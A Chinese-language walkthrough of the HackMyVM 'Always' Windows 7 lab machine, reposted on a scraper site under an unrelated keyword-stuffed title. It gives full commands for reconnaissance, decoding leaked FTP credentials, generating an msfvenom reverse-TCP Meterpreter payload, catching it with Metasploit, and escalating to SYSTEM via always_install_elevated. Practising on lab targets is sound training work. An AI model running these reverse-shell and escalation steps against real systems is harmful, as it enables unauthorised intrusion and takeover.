当前位置: 首页> 健康> 养生 > 北京知名的品牌设计公司_遵义市人民政府门户网站_一键优化表格_网站seo优化方案策划书

北京知名的品牌设计公司_遵义市人民政府门户网站_一键优化表格_网站seo优化方案策划书

时间:2025/7/11 18:08:57来源:https://blog.csdn.net/2301_79698171/article/details/144967863 浏览次数:1次
北京知名的品牌设计公司_遵义市人民政府门户网站_一键优化表格_网站seo优化方案策划书

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:win7(192.168.101.246)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、ftp(登录ftp)、msfvenom(生成反连木马)、msfconsole(漏洞利用)

测试网址:http://192.168.101.246:8080

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Always

二、测试目的

基于渗透测试流程测试该Windows靶机,拿到密码信息,提权到system权限拿到两个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

可以看到靶机IP:192.168.101.246

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.246

可以看到开启了很多端口:21、135、139、445、3389、5357、8080

目录扫描

gobuster dir -u http://192.168.101.246:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

扫到一个主页和后台

查看后台主页的源码,使用前端验证,而且直接将用户名和密码暴露了

admin/adminpass123

2、Getshell

登录后台,进去是一串base64加密的密文

ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=

解密得到:ftpuser:KeepGoingBro!!!

这是ftp的用户名和密码,ftpuser是用户名:

ftpuser/KeepGoingBro!!!

登录ftp,有一个robots.txt文件可以下载

ftp 192.168.101.246
get robots.txt

查看robots.txt文件,发现一个新的文件地址:/admins-secret-pagexxx.html

cat robots.txt

进入该网页,是一个备份笔记

提示了always用户和密码,解密得到如下密码:

always/YouCantFindMe.!.!

根据靶机开启了3389端口,尝试远程登录

但是没always用户登录失败

看到ftpuser用户,尝试登录,也不让远程登录

这里没找到其他方法,直接登录靶机上传shell吧(近源攻击)

Msfvenom生成反弹shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.127 lport=6000 -f exe -o test.exe

开启监听,并在靶机执行exe文件

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.101.127
set lport 6000
run

3、提权

使用msf插件自动寻找Windows提权方法

bg
use multi/recon/local_exploit_suggester
set session 1
run

查找到了14个可利用的exp

使用第一个模块即可提权system权限

use exploit/windows/local/always_install_elevated
set lhost 192.168.101.127
set session 1
run

进入cmd,在Always用户的桌面找到

user.txt:HMV{You_Found_Me!}

cd c:/Users/Always/Desktop
type user.txt

在administrator用户的桌面找到

root.txt:HMV{White_Flag_Raised}

cd c:/Users/Administrator/Desktop
dir
type root.txt

四、结论

靶机开放了很多服务,并且没做防护,可以很轻松拿到密码,并且得到system权限。

关键字:北京知名的品牌设计公司_遵义市人民政府门户网站_一键优化表格_网站seo优化方案策划书

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: